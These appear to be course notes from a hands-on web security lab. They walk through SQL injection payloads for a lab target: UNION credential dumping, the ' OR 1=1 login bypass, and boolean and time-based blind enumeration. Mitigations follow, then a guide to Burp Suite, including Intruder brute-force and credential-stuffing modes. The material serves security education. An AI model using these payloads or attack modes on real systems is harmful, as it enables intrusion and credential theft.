This is similar to the previous SQL query. However, the information we want to retrieve has changed from table_name to column_name, the table we are querying in the information_schema database has changed from tables to columns, and we're searching for any rows where the table_name column has a value of staff_users.

The query results provide three columns for the staff_users table: id, password, and username. We can use the username and password columns for our following query to retrieve the user's information.

0 UNION SELECT 1,2,group_concat(username,':',password SEPARATOR '<br>') FROM staff_users

Again we use the group_concat method to return all of the rows into one string and to make it easier to read. We've also added ,:, to split the username and password from each other. Instead of being separated by a comma, we've chosen the HTML <br> tag that forces each result to be on a separate line to make for easier reading.

Blind SQli - Authentication Bypass

Unlike In-Band SQL injection, where we can see the results of our attack directly on the screen, blind SQLi is when we get little to no feedback to confirm whether our injected queries were, in fact, successful or not, this is because the error messages have been disabled, but the injection still works regardless. It might surprise you that all we need is that little bit of feedback to successful enumerate a whole database.

Authentication Bypass

One of the most straightforward Blind SQL Injection techniques is when bypassing authentication methods such as login forms. In this instance, we aren't that interested in retrieving data from the database. We just want to get past the login.

Login forms that are connected to a database of users are often developed in such a way that the web application isn't interested in the content of the username and password but more whether the two make a matching pair in the users table. In basic terms, the web application is asking the database "do you have a user with the username bob and the password bob123?", and the database replies with either yes or no (true/false) and, depending on that answer, dictates whether the web application lets you proceed or not.

Taking the above information into account, it's unnecessary to enumerate a valid username/password pair. We just need to create a database query that replies with a yes/true.


select * from users where username='%username%' and password='%password%' LIMIT 1;

N.B The %username% and %password% values are taken from the login form fields, the initial values in the SQL Query box will be blank as these fields are currently empty.

To make this into a query that always returns as true, we can enter the following into the password field:

' OR 1=1;--

Which turns the SQL query into the following:

select * from users where username='' and password='' OR 1=1;

Because 1=1 is a true statement and we've used an OR operator, this will always cause the query to return as true, which satisfies the web applications logic that the database found a valid username/password combination and that access should be allowed.

Boolean Based

Boolean based SQL Injection refers to the response we receive back from our injection attempts which could be a true/false, yes/no, on/off, 1/0 or any response which can only ever have two outcomes. That outcome confirms to us that our SQL Injection payload was either successful or not. On the first inspection, you may feel like this limited response can't provide much information. Still, in fact, with just these two responses, it's possible to enumerate a whole database structure and contents.


The browser body contains the contents of {"taken":true}. This API endpoint replicates a common feature found on many signup forms, which checks whether a username has already been registered to prompt the user to choose a different username. Because the taken value is set to true, we can assume the username admin is already registered. In fact, we can confirm this by changing the username in the mock browser's address bar from admin to admin123, and upon pressing enter, you'll see the value taken has now changed to false.

The SQL query that is processed looks like the following:

select * from users where username = '%username%' LIMIT 1;

As the only input, we have control over is the username in the query string, we'll have to use this to perform our SQL Injection. Keeping the username as admin123, we can start appending to this to try and make the database confirm true things, which will change the state of the taken field from false to true.

Like in previous levels, our first task is to establish the number of columns in the users table, which we can achieve by using the UNION statement. Change the username value to the following:

admin123' UNION SELECT 1;--

As the web application has responded with the value taken as false, we can confirm this is the incorrect value of columns. Keep on adding more columns until we have a taken value of true. You can confirm that the answer is three columns by setting the username to the below value:

admin123' UNION SELECT 1,2,3;--

Now that our number of columns has been established, we can work on the enumeration of the database. Our first task is discovering the database name. We can do this by using the built-in database() method and then using the like operator to try and find results that will return a true status.

Try the below username value and see what happens:

admin123' UNION SELECT 1,2,3 where database() like '%';--

We get a true response because, in the like operator, we just have the value of %, which will match anything as it's the wildcard value. If we change the wildcard operator to a%, you'll see the response goes back to false, which confirms that the database name does not begin with the letter a. We can cycle through all the letters, numbers and characters such as - and _ until we discover a match. If you send the below as the username value, you'll receive a true response that confirms the database name begins with the letter s.

admin123' UNION SELECT 1,2,3 where database() like 's%';--

Now you move onto the next character of the database name until you find another true response, for example, 'sa%', 'sb%', 'sc%' etc. Keep on with this process until you discover all the characters of the database name, which is sqli_three.

We've established the database name, which we can now use to enumerate table names using a similar method by utilising the information_schema database. Try setting the username to the following value:

admin123' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'sqli_three' and table_name like 'a%';--

This query looks for results in the information_schema database in the tables table where the database name matches sqli_three, and the table name begins with the letter a. As the above query results in a false response, we can confirm that there are no tables in the sqli_three database that begin with the letter a. Like previously, you'll need to cycle through letters, numbers and characters until you find a positive match.

admin123' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'sqli_three' and table_name='users';--

Lastly, we now need to enumerate the column names in the users table so we can properly search it for login credentials. Again using the information_schema database and the information we've already gained, we can start querying it for column names. Using the payload below, we search the columns table where the database is equal to sqli_three, the table name is users, and the column name begins with the letter a.

admin123' UNION SELECT 1,2,3 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='sqli_three' and TABLE_NAME='users' and COLUMN_NAME like 'a%';

Again you'll need to cycle through letters, numbers and characters until you find a match. As you're looking for multiple results, you'll have to add this to your payload each time you find a new column name, so you don't keep discovering the same one. For example, once you've found the column named id, you'll append that to your original payload (as seen below).

admin123' UNION SELECT 1,2,3 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='sqli_three' and TABLE_NAME='users' and COLUMN_NAME like 'a%' and COLUMN_NAME !='id';

Repeating this process three times will enable you to discover the columns id, username and password. Which now you can use to query the users table for login credentials. First, you'll need to discover a valid username which you can use the payload below:

admin123' UNION SELECT 1,2,3 from users where username like 'a%

Which, once you've cycled through all the characters, you will confirm the existence of the username admin. Now you've got the username. You can concentrate on discovering the password. The payload below shows you how to find the password:

admin123' UNION SELECT 1,2,3 from users where username='admin' and password like 'a%

Cycling through all the characters, you'll discover the password is 3845.


A time-based blind SQL Injection is very similar to the above Boolean based, in that the same requests are sent, but there is no visual indicator of your queries being wrong or right this time. Instead, your indicator of a correct query is based on the time the query takes to complete. This time delay is introduced by using built-in methods such as SLEEP(x) alongside the UNION statement. The SLEEP() method will only ever get executed upon a successful UNION SELECT statement.

So, for example, when trying to establish the number of columns in a table, you would use the following query:

admin123' UNION SELECT SLEEP(5);--

If there was no pause in the response time, we know that the query was unsuccessful, so like on previous tasks, we add another column:

admin123' UNION SELECT SLEEP(5),2;--

This payload should have produced a 5-second time delay, which confirms the successful execution of the UNION statement and that there are two columns.

You can now repeat the enumeration process from the Boolean based SQL Injection, adding the SLEEP() method into the UNION SELECT statement.

If you're struggling to find the table name the below query should help you on your way:

referrer=admin123' UNION SELECT SLEEP(5),2 where database() like 'u%';--

Out-of-Band SQLi

Out-of-Band SQL Injection isn't as common as it either depends on specific features being enabled on the database server or the web application's business logic, which makes some kind of external network call based on the results from an SQL query.

An Out-Of-Band attack is classified by having two different communication channels, one to launch the attack and the other to gather the results. For example, the attack channel could be a web request, and the data gathering channel could be monitoring HTTP/DNS requests made to a service you control.

  1. An attacker makes a request to a website vulnerable to SQL Injection with an injection payload.
  2. The Website makes an SQL query to the database which also passes the hacker's payload.
  3. The payload contains a request which forces an HTTP request back to the hacker's machine containing data from the database.


As impactful as SQL Injection vulnerabilities are, developers do have a way to protect their web applications from them by following the below advice:

Prepared Statements (With Parameterized Queries)

In a prepared query, the first thing a developer writes is the SQL query and then any user inputs are added as a parameter afterwards. Writing prepared statements ensures that the SQL code structure doesn't change and the database can distinguish between the query and the data. As a benefit, it also makes your code look a lot cleaner and easier to read.

Input Validation

Input validation can go a long way to protecting what gets put into an SQL query. Employing an allow list can restrict input to only certain strings, or a string replacement method in the programming language can filter the characters you wish to allow or disallow.

Escaping User Input

Allowing user input containing characters such as ' " $ \ can cause SQL Queries to break or, even worse, as we've learnt, open them up for injection attacks. Escaping user input is the method of prepending a backslash () to these characters, which then causes them to be parsed just as a regular string and not a special character.

Burp Suite


Burp Suite is a framework written in Java that aims to provide a one-stop-shop for web application penetration testing. In many ways, this goal is achieved as Burp is very much the industry standard tool for hands-on web app security assessments. Burp Suite is also very commonly used when assessing mobile applications, as the same features which make it so attractive for web app testing translate almost perfectly into testing the APIs (Application Programming Interfaces) powering most mobile apps.

At the simplest level, Burp can capture and manipulate all of the traffic between an attacker and a webserver: this is the core of the framework. After capturing requests, we can choose to send them to various other parts of the Burp Suite framework -- we will be covering some of these tools in upcoming rooms. This ability to intercept, view, and modify web requests prior to them being sent to the target server (or, in some cases, the responses before they are received by our browser), makes Burp Suite perfect for any kind of manual web app testing.

There are various different editions of Burp Suite available. We will be working with the Burp Suite Community edition, as this is free to use for any (legal) non-commercial use. The Burp Suite Professional and Enterprise editions both require expensive licenses but come with powerful extra features:

  • Burp Suite Professional is an unrestricted version of Burp Suite Community. It comes with features such as:

    • An automated vulnerability scanner
    • A fuzzer/bruteforcer that isn't rate limited
    • Saving projects for future use; report generation
    • A built-in API to allow integration with other tools
    • Unrestricted access to add new extensions for greater functionality
    • Access to the Burp Suite Collaborator (effectively providing a unique request catcher self-hosted or running on a Portswigger owned server)

In short, Burp Pro is an extremely powerful tool -- which is why it comes with a £319/$399 price tag per user for a one-year subscription. For this reason, Burp Pro is usually only used by professionals (with licenses often being provided by employers). - Burp Suite Enterprise is slightly different. Unlike the community and professional editions, Burp Enterprise is used for continuous scanning. It provides an automated scanner that can periodically scan webapps for vulnerabilities in much the same way as software like Nessus performs automated infrastructure scanning. Unlike the other editions of Burp Suite which allow you to perform manual attacks from your own computer, Enterprise sits on a server and constantly scans target web apps for vulnerabilities.


Whilst Burp Community has a relatively limited feature-set compared to the Professional edition, it still has many superb tools available. These include:

  • Proxy: The most well-known aspect of Burp Suite, the Burp Proxy allows us to intercept and modify requests/responses when interacting with web applications.
  • Repeater: The second most well-known Burp feature -- Repeater -- allows us to capture, modify, then resend the same request numerous times. This feature can be absolutely invaluable, especially when we need to craft a payload through trial and error (e.g. in an SQLi -- Structured Query Language Injection) or when testing the functionality of an endpoint for flaws.
  • Intruder: Although harshly rate-limited in Burp Community, Intruder allows us to spray an endpoint with requests. This is often used for bruteforce attacks or to fuzz endpoints.
  • Decoder: Though less-used than the previously mentioned features, Decoder still provides a valuable service when transforming data -- either in terms of decoding captured information, or encoding a payload prior to sending it to the target. Whilst there are other services available to do the same job, doing this directly within Burp Suite can be very efficient.
  • Comparer: As the name suggests, Comparer allows us to compare two pieces of data at either word or byte level. Again, this is not something that is unique to Burp Suite, but being able to send (potentially very large) pieces of data directly into a comparison tool with a single keyboard shortcut can speed things up considerably.
  • Sequencer: We usually use Sequencer when assessing the randomness of tokens such as session cookie values or other supposedly random generated data. If the algorithm is not generating secure random values, then this could open up some devastating avenues for attack.

In addition to the myriad of in-built features, the Java codebase also makes it very easy to write extensions to add to the functionality of the Burp framework. These can be written in Java, Python (using the Java Jython interpreter), or Ruby (using the Java JRuby interpreter). The Burp Suite Extender module can quickly and easily load extensions into the framework, as well as providing a marketplace to download third-party modules (referred to as the "BApp Store"). Whilst many of these extensions require a professional license to download and add in, there are still a fair number that can be integrated with Burp Community. For example, we may wish to extend the inbuilt logging functionality of Burp Suite with the Logger++ module.


  • Global settings can be found in the User options tab along the top menu bar.
  • Project-specific settings can be found in the Project options tab.

We will start with the User Options tab. The settings here apply globally (i.e. they control the Burp Suite application -- not just the project). That said, many of them can be overwritten in the project settings.

There are four main sub-sections of the User options tab: - The options in the Connections sub-tab allow us to control how Burp makes connections to targets. For example, we can set a proxy for Burp Suite to connect through; this is very useful if we want to use Burp Suite through a network pivot. - The TLS sub-tab allows us to enable and disable various TLS (Transport Layer Security) options, as well as giving us a place to upload client certificates should a web app require us to use one for connections. - An essential set of options: Display allows us to change how Burp Suite looks. The options here include things like changing the font and scale, as well as setting the theme for the framework (e.g. dark mode) and configuring various options to do with the rendering engine in Repeater (more on this later!). - The Misc sub-tab contains a wide variety of settings, including the keybinding table (HotKeys), which allowing us to view and alter the keyboard shortcuts used by Burp Suite. Familiarising yourself with these settings would be advisable, as using the keybinds can speed up your workflow massively.

With these options, we can customise our Burp install to suit our individual preferences.

Let's move on to look at the project-specific configurations available in the Project options tab.

There are five sub-tabs here: - Connections holds many of the same options as the equivalent section of the User options tab: these can be used to override the application-wide settings. For example, it is possible to set a proxy for just the project, overriding any proxy settings that you set in the User options tab. There are a few differences between this sub-tab and that of the User options, however. For example, the "Hostname Resolution" option (allowing you to map domains to IPs directly within Burp Suite) can be very handy -- as can the "Out-of-Scope Requests" settings, which enable us to determine whether Burp will send requests to anything you aren't explicitly targeting (more on this later!). - The HTTP sub-tab defines how Burp handles various aspects of the HTTP protocol: for example, whether it follows redirects or how to handle unusual response codes. - TLS allows us to override application-wide TLS options, as well as showing us a list of public server certificates for sites that we have visited. - The Sessions tab provides us with options for handling sessions. It allows us to define how Burp obtains, saves, and uses session cookies that it receives from target sites. It also allows us to define macros which we can use to automate things such as logging into web applications (giving us an instant authenticated session, assuming we have valid credentials). - There are fewer options in the Misc sub-tab than in the equivalent tab for the "User options" section. Many of the options here are also only available if you have access to Burp Pro (such as those configuring Collaborator). That said, there are a couple of options related to logging and the embedded browser (which we will look at in a couple of tasks) that are well worth perusing.

Burp Proxy

The Burp Proxy is the most fundamental (and most important!) of the tools available in Burp Suite. It allows us to capture requests and responses between ourselves and our target. These can then be manipulated or sent to other tools for further processing before being allowed to continue to their destination.

Burp Suite will still (by default) be logging requests made through the proxy when the intercept is off. This can be very useful for going back and analysing prior requests, even if we didn't specifically capture them when they were made.

Burp will also capture and log WebSocket communication, which, again, can be exceedingly helpful when analysing a web app.

The logs can be viewed by going to the "HTTP history" and "WebSockets history" sub-tabs.

It is worth noting that any requests captured here can be sent to other tools in the framework by right-clicking them and choosing "Send to...". For example, we could take a previous HTTP request that has already been proxied to the target and send it to Repeater.

Proxying HTTPS

What happens if we navigate to a site with TLS enabled?

We get an error.

Specifically, Firefox is telling us that the Portswigger Certificate Authority (CA) isn't authorised to secure the connection.

Fortunately, Burp offers us an easy way around this. We need to get Firefox to trust connections secured by Portswigger certs, so we will manually add the CA certificate to our list of trusted certificate authorities.

First, with the proxy activated head to http://burp/cert; this will download a file called cacert.der -- save it somewhere on your machine.

Next, type about:preferences into your Firefox search bar and press enter; this takes us to the FireFox settings page. Search the page for "certificates" and we find the option to "View Certificates".

Clicking the "View Certificates" button allows us to see all of our trusted CA certificates. We can register a new certificate for Portswigger by pressing "Import" and selecting the file that we just downloaded.

In the menu that pops up, select "Trust this CA to identify websites", then click Ok.

Scoping and targeting

Finally, we come to one of the most important parts of using the Burp Proxy: Scoping.

It can get extremely tedious having Burp capturing all of our traffic. When it logs everything (including traffic to sites we aren't targeting), it muddies up logs we may later wish to send to clients. In short, allowing Burp to capture everything can quickly become a massive pain.

What's the solution? Scoping.

Setting a scope for the project allows us to define what gets proxied and logged. We can restrict Burp Suite to only target the web application(s) that we want to test. The easiest way to do this is by switching over to the "Target" tab, right-clicking our target from our list on the left, then choosing "Add To Scope". Burp will then ask us whether we want to stop logging anything which isn't in scope -- most of the time we want to choose "yes" here.

We just chose to disable logging for out of scope traffic, but the proxy will still be intercepting everything. To turn this off, we need to go into the Proxy Options sub-tab and select "And URL Is in target scope" from the Intercept Client Requests section.

Site map and issue Definitions

Control of the scope may be the most useful aspect of the Target tab, but it's by no means the only use for this section of Burp.

There are three sub-tabs under Target: - Site map allows us to map out the apps we are targeting in a tree structure. Every page that we visit will show up here, allowing us to automatically generate a site map for the target simply by browsing around the web app. Burp Pro would also allow us to spider the targets automatically (i.e. look through every page for links and use them to map out as much of the site as-is publicly accessible using the links between pages); however, with Burp Community, we can still use this to accumulate data whilst we perform our initial enumeration steps. The Site map can be especially useful if we want to map out an API, as whenever we visit a page, any API endpoints that the page retrieves data from whilst loading will show up here. - Scope: We have already seen the Scope sub-tab -- it allows us to control Burp's target scope for the project. - Issue Definitions: Whilst we don't have access to the Burp Suite vulnerability scanner in Burp Community, we do still have access to a list of all the vulnerabilities it looks for. The Issue Definitions section gives us a huge list of web vulnerabilities (complete with descriptions and references) which we can draw from should we need citations for a report or help describing a vulnerability.


We will be covering how to use Repeater to manipulate and arbitrarily resend captured requests, as well as looking at some of the niftier options available in this awesome tool. Finally, we will encounter a series of examples, including a real-world, extra-mile exercise which we will use to consolidate the more theoretical aspects of the room.

What is repeater?

In short: Burp Suite Repeater allows us to craft and/or relay intercepted requests to a target at will. In layman's terms, it means we can take a request captured in the Proxy, edit it, and send the same request repeatedly as many times as we wish. Alternatively, we could craft requests by hand, much as we would from the CLI (Command Line Interface), using a tool such as cURL to build and send requests.

This ability to edit and resend the same request multiple times makes Repeater ideal for any kind of manual poking around at an endpoint, providing us with a nice Graphical User Interface (GUI) for writing the request payload and numerous views (including a rendering engine for a graphical view) of the response so that we can see the results of our handiwork in action.

The Repeater interface can be split into six main sections -- an annotated diagram can be found below the following bullet points:

  • At the very top left of the tab, we have a list of Repeater requests. We can have many different requests going through Repeater: each time we send a new request to Repeater, it will appear up here.
  • Directly underneath the request list, we have the controls for the current request. These allow us to send a request, cancel a hanging request, and go forwards/backwards in the request history.
  • Still on the left-hand side of the tab, but taking up most of the window, we have the request and response view. We edit the request in the Request view then press send. The response will show up in the Response view.
  • Above the request/response section, on the right-hand side, is a set of options allowing us to change the layout for the request and response views. By default, this is usually side-by-side (horizontal layout, as in the screenshot); however, we can also choose to put them above/below each other (vertical layout) or in separate tabs (combined view).
  • At the right-hand side of the window, we have the Inspector, which allows us to break requests apart to analyse and edit them in a slightly more intuitive way than with the raw editor. We will cover this in a later task.
  • Finally, above the Inspector we have our target. Quite simply, this is the IP address or domain to which we are sending requests. When we send requests to Repeater from other parts of Burp Suite, this will be filled in automatically.

Basic Usage

With a request captured in the proxy, we can send to repeater either by right-clicking on the request and choosing "Send to Repeater" or by pressing Ctrl + R.

The target and Inspector elements are now also showing information; however, we do not yet have a response. When we click the "Send" button, the Response section quickly populates.

If we want to change anything about the request, we can simply type in the Request window and press "Send" again; this will update the Response on the right. For example, changing the "Connection" header to open rather than close results in a response "Connection" header with a value of keep-alive.


We have four display options here: - Pretty: This is the default option. It takes the raw response and attempts to beautify it slightly, making it easier to read. - Raw: The pure, un-beautified response from the server. - Hex: This view takes the raw response and gives us a byte view of it -- especially useful if the response is a binary file. - Render: The render view renders the page as it would appear in your browser. Whilst not hugely useful given that we would usually be interested in the source code when using Repeater, this is still a neat trick.

In most instances, the "Pretty" option is perfectly adequate; however, it is still well worth knowing how to use the other three options.

Just to the right of the view buttons is the "Show non-printable characters" button (\n). This button allows us to display characters that usually wouldn't show up in the Pretty or Raw views. For example, every line in the response will end with the characters \r\n -- these signify a carriage return followed by a newline and are part of how HTTP headers are interpreted.


  • Query Parameters, which refer to data being sent to the server in the URL. For example, in a GET request to, there is a query parameter called "redirect" with a value of "false".
  • Body Parameters, which do the same thing as Query Parameters, but for POST requests. Anything that we send as data in a POST request will show up in this section, once again allowing us to modify the parameters before re-sending.
  • Request Cookies contain, as you may expect, a modifiable list of the cookies which are being sent with each request.
  • Request Headers allow us to view, access, and modify (including outright adding or removing) any of the headers being sent with our requests. Editing these can be very useful when attempting to see how a webserver will respond to unexpected headers.
  • Response Headers show us the headers that the server sent back in response to our request. These cannot be edited (as we can't control what headers the server returns to us!). Note that this section will only show up after we have sent the request and received a response.


Intruder is Burp Suite's in-built fuzzing tool. It allows us to take a request (usually captured in the Proxy before being passed into Intruder) and use it as a template to send many more requests with slightly altered values automatically. For example, by capturing a request containing a login attempt, we could then configure Intruder to swap out the username and password fields for values from a wordlist, effectively allowing us to bruteforce the login form. Similarly, we could pass in a fuzzing wordlist and use Intruder to fuzz for subdirectories, endpoints, or virtual hosts. This functionality is very similar to that provided by command-line tools such as Wfuzz or Ffuf.

In short, as a method for automating requests, Intruder is extremely powerful -- there is just one problem: to access the full speed of Intruder, we need Burp Professional. We can still use Intruder with Burp Community, but it is heavily rate-limited. This speed restriction means that many hackers choose to use other tools for fuzzing and bruteforcing.

The first view we get is a relatively sparse interface that allows us to choose our target. Assuming that we sent a request in from the Proxy (by using Ctrl + I or right-clicking and selecting "Send to Intruder"), this should already be populated for us.

There are four other Intruder sub-tabs:

  • Positions allows us to select an Attack Type (we will cover these in an upcoming task), as well as configure where in the request template we wish to insert our payloads.
  • Payloads allows us to select values to insert into each of the positions we defined in the previous sub-tab. For example, we may choose to load items in from a wordlist to serve as payloads. How these get inserted into the template depends on the attack type we chose in the Positions tab. There are many payload types to choose from (anything from a simple wordlist to regexes based on responses from the server). The Payloads sub-tab also allows us to alter Intruder's behaviour with regards to payloads; for example, we can define pre-processing rules to apply to each payload (e.g. add a prefix or suffix, match and replace, or skip if the payload matches a defined regex).
  • Resource Pool is not particularly useful to us in Burp Community. It allows us to divide our resources between tasks. Burp Pro would allow us to run various types of automated tasks in the background, which is where we may wish to manually allocate our available memory and processing power between these automated tasks and Intruder. Without access to these automated tasks, there is little point in using this, so we won't devote much time to it.
  • As with most of the other Burp tools, Intruder allows us to configure attack behaviour in the Options sub-tab. The settings here apply primarily to how Burp handles results and how Burp handles the attack itself. For example, we can choose to flag requests that contain specified pieces of text or define how Burp responds to redirect (3xx) responses.


When we are looking to perform an attack with Intruder, the first thing we need to do is look at positions. Positions tell Intruder where to insert payloads.

Notice that Burp will attempt to determine the most likely places we may wish to insert a payload automatically -- these are highlighted in green and surrounded by silcrows (§).

On the right-hand side of the interface, we have the buttons labelled "Add §", "Clear §", and "Auto §":

  • Add lets us define new positions by highlighting them in the editor and clicking the button.
  • Clear removes all defined positions, leaving us with a blank canvas to define our own.
  • Auto attempts to select the most likely positions automatically; this is useful if we cleared the default positions and want them back.

Attack types

There are four attack types available: - Sniper - Battering ram - Pitchfork - Cluster bomb


Sniper is the first and most common attack type.

When conducting a sniper attack, we provide one set of payloads. For example, this could be a single file containing a wordlist or a range of numbers. From here on out, we will refer to a list of items to be slotted into requests using the Burp Suite terminology of a "Payload Set". Intruder will take each payload in a payload set and put it into each defined position in turn.



There are two positions defined here, targeting the username and password body parameters.

In a sniper attack, Intruder will take each position and substitute each payload into it in turn.

For example, let's assume we have a wordlist with three words in it: burp, suite, and intruder.

With the two positions that we have above, Intruder would use these words to make six requests:

Request Number Request Body
1 username=burp&password=Expl01ted
2 username=suite&password=Expl01ted
3 username=intruder&password=Expl01ted
4 username=pentester&password=burp
5 username=pentester&password=suite
6 username=pentester&password=intruder

Notice how Intruder starts with the first position (username) and tries each of our payloads, then moves to the second position and tries the same payloads again. We can calculate the number of requests that Intruder Sniper will make as requests = numberOfWords * numberOfPositions.

This quality makes Sniper very good for single-position attacks (e.g. a password bruteforce if we know the username or fuzzing for API endpoints).

Battering Ram

Like Sniper, Battering ram takes one set of payloads (e.g. one wordlist). Unlike Sniper, the Battering ram puts the same payload in every position rather than in each position in turn.

Let's use the same wordlist and example request as we did in the last task to illustrate this.


If we use Battering ram to attack this, Intruder will take each payload and substitute it into every position at once.

With the two positions that we have above, Intruder would use the three words from before (burp, suite, and intruder) to make three requests:

Request Number Request Body
1 username=burp&password=burp
2 username=suite&password=suite
3 username=intruder&password=intruder
As can be seen in the table, each item in our list of payloads gets put into every position for each request. True to the name, Battering ram just throws payloads at the target to see what sticks.


After Sniper, Pitchfork is the attack type you are most likely to use. It may help to think of Pitchfork as being like having numerous Snipers running simultaneously. Where Sniper uses one payload set (which it uses on every position simultaneously), Pitchfork uses one payload set per position (up to a maximum of 20) and iterates through them all at once.

This type of attack can take a little time to get your head around, so let's use our bruteforce example from before, but this time we need two wordlists:

  • Our first wordlist will be usernames. It contains three entries: joel, harriet, alex.
  • Let's say that Joel, Harriet, and Alex have had their passwords leaked: we know that Joel's password is J03l, Harriet's password is Emma1815, and Alex's password is Sk1ll.

We can use these two lists to perform a pitchfork attack on the login form from before. The process for carrying out this attack will not be covered in this task, but you will get plenty of opportunities to perform attacks like this later!

When using Intruder in pitchfork mode, the requests made would look something like this:

Request Number Request Body
1 username=joel&password=J03l
2 username=harriet&password=Emma1815
3 username=alex&password=Sk1ll

See how Pitchfork takes the first item from each list and puts them into the request, one per position? It then repeats this for the next request: taking the second item from each list and substituting it into the template. Intruder will keep doing this until one (or all) of the lists run out. Ideally, our payload sets should be identical lengths when working in Pitchfork, as Intruder will stop testing as soon as one of the lists is complete. For example, if we have two lists, one with 100 lines and one with 90 lines, Intruder will only make 90 requests, and the final ten items in the first list will not get tested.

This attack type is exceptionally useful when forming things like credential stuffing attacks.

Cluster Bomb

Like Pitchfork, Cluster bomb allows us to choose multiple payload sets: one per position, up to a maximum of 20; however, whilst Pitchfork iterates through each payload set simultaneously, Cluster bomb iterates through each payload set individually, making sure that every possible combination of payloads is tested.

Again, the best way to visualise this is with an example.

Let's use the same wordlists as before:

  • Usernames: joel, harriet, alex.
  • Passwords: J03l, Emma1815, Sk1ll.

But, this time, let's assume that we don't know which password belongs to which user. We have three users and three passwords, but we don't know how to match them up. In this case, we would use a cluster bomb attack; this will try every combination of values. The request table for our username and password positions looks something like this:

Request Number Request Body
1 username=joel&password=J03l
2 username=harriet&password=J03l
3 username=alex&password=J03l
4 username=joel&password=Emma1815
5 username=harriet&password=Emma1815
6 username=alex&password=Emma1815
7 username=joel&password=Sk1ll
8 username=harriet&password=Sk1ll
9 username=alex&password=Sk1ll

Cluster Bomb will iterate through every combination of the provided payload sets to ensure that every possibility has been tested. This attack-type can create a huge amount of traffic (equal to the number of lines in each payload set multiplied together), so be careful! Equally, when using Burp Community and its Intruder rate-limiting, be aware that a Cluster Bomb attack with any moderately sized payload set will take an incredibly long time.

That said, this is another extremely useful attack type for any kind of credential bruteforcing where a username isn't known.


Switch over to the "Payloads" sub-tab; this is split into four sections:

  • The Payload Sets section allows us to choose which position we want to configure a set for as well as what type of payload we would like to use.
    • When we use an attack type that only allows for a single payload set (i.e. Sniper or Battering Ram), the dropdown menu for "Payload Set" will only have one option, regardless of how many positions we have defined.
    • If we are using one of the attack types that use multiple payload sets (i.e. Pitchfork or Cluster Bomb), then there will be one item in the dropdown for each position. Note: Multiple positions should be read from top to bottom, then left to right when being assigned numbers in the "Payload set" dropdown. For example, with two positions (username=§pentester§&password=§Expl01ted§), the first item in the payload set dropdown would refer to the username field, and the second would refer to the password field.
    • The second dropdown in this section allows us to select a "payload type". By default, this is a "Simple list" -- which, as the name suggests, lets us load in a wordlist to use. There are many other payload types available -- some common ones include: Recursive Grep, Numbers, and Username generator. It is well worth perusing this list to get a feel for the wide range of options available.
  • Payload Options differ depending on the payload type we select for the current payload set. For example, a "Simple List" payload type will give us a box to add and remove payloads to and from the set. We can do this manually using the "Add" text box, paste lines in with "Paste", or "Load..." from a file. The "Remove" button removes the currently selected line only. The "Clear" button clears the entire list. Be warned: loading extremely large lists in here can cause Burp to crash! By contrast, the options for a Numbers payload type allows us to change options such as the range of numbers used and the base that we are working with.
  • Payload Processing allows us to define rules to be applied to each payload in the set before being sent to the target. For example, we could capitalise every word or skip the payload if it matches a regex. You may not use this section particularly regularly, but you will definitely appreciate it when you do need it!
  • Finally, we have the Payload Encoding section. This section allows us to override the default URL encoding options that are applied automatically to allow for the safe transmission of our payload. Sometimes it can be beneficial to not URL encode these standard "unsafe" characters, which is where this section comes in. We can either adjust the list of characters to be encoded or outright uncheck the "URL-encode these characters" checkbox.

Other Modules

Specifically, we will be looking at the Decoder, Comparer and Sequencer tools. These allow us to: work with encoded text; compare sets of text; and analyse the randomness of captured tokens, respectively. Being able to perform these relatively straightforward tasks directly within Burp Suite can save a lot of time, so it is well worth the time spent learning to use these modules efficiently.


The Burp Suite Decoder module allows us to manipulate data. As the name suggests, we can decode information that we capture during an attack, but we can also encode data of our own, ready to be sent to the target. Decoder also allows us to create hashsums of data, as well as providing a Smart Decode feature which attempts to decode provided data recursively until it is back to being plaintext (like the "Magic" function of Cyberchef).

This interface offers us a number of options.

  • The box on the left is where we would paste or type text to be encoded or decoded. As with most other modules of Burp Suite, we can also send data here from other sections of the framework by right-clicking and choosing Send to Decoder.
  • We have the option to select between treating the input as text or hexadecimal byte values at the top of the list on the right.
  • Further down the list, we have dropdown menus to Encode, Decode or Hash the input.
  • Finally, we have the "Smart Decode" feature, which attempts to decode the input automatically.


As the name suggests, Comparer allows us to compare two pieces of data, either by ASCII words or by bytes.


Sequencer is one of those tools that rarely ever gets used in CTFs and other lab environments but is an essential part of a real-world web app penetration test.

In short, Sequencer allows us to measure the entropy (or randomness, in other words) of "tokens" -- strings that are used to identify something and should, in theory, be generated in a cryptographically secure manner. For example, we may wish to analyse the randomness of a session cookie or a Cross-Site Request Forgery (CSRF) token protecting a form submission. If it turns out that these tokens are not generated securely, then we can (in theory) predict the values of upcoming tokens. Just imagine the implications of this if the token in question is used for password resets...

There are two main methods we can use to perform token analysis with Sequencer:

  • Live capture is the more common of the two methods -- this is the default sub-tab for Sequencer. Live capture allows us to pass a request to Sequencer, which we know will create a token for us to analyse. For example, we may wish to pass a POST request to a login endpoint into Sequencer, as we know that the server will respond by giving us a cookie. With the request passed in, we can tell Sequencer to start a live capture: it will then make the same request thousands of times automatically, storing the generated token samples for analysis. Once we have accumulated enough samples, we stop Sequencer and allow it to analyse the captured tokens.
  • Manual load allows us to load a list of pre-generated token samples straight into Sequencer for analysis. Using Manual Load means we don't have to make thousands of requests to our target (which is both loud and resource intensive), but it does mean that we need to obtain a large list of pre-generated tokens!


The default view in the Extender interface gives us an overview of the extensions that we have loaded into Burp Suite. There are none in the screenshot above -- we will change this in the next few tasks. The first box (towards the top of the interface) provides us with a list of extensions that we have installed and allows us to activate or deactivate them for this project.

The options to the left of this box allow us to uninstall extensions with the Remove button or install new ones from files on our disk with the Add button. These could be either modules that we have coded or modules that have been made available on the internet but are not in the BApp store. The Up and Down buttons in this section control the order that installed extensions are listed in. Extensions are invoked in descending order based on this list. In other words: all traffic passing through Burp Suite will be passed through each extension in order, starting at the top of the list and working down. This can be very important when dealing with extensions that modify the requests as some may counteract or otherwise hinder one another.

Towards the bottom of the window, we have Details, Output and Errors for the currently selected module. These can be used to view module information, as well as for debugging

BApp Store

The Burp App Store (or BApp Store for short) gives us a way to easily list official extensions and integrate them seamlessly with Burp Suite. Extensions can be written in a variety of languages -- most commonly Java (which integrates into the framework automatically) or Python (which requires the Jython interpreter -- more on this in the next task!).


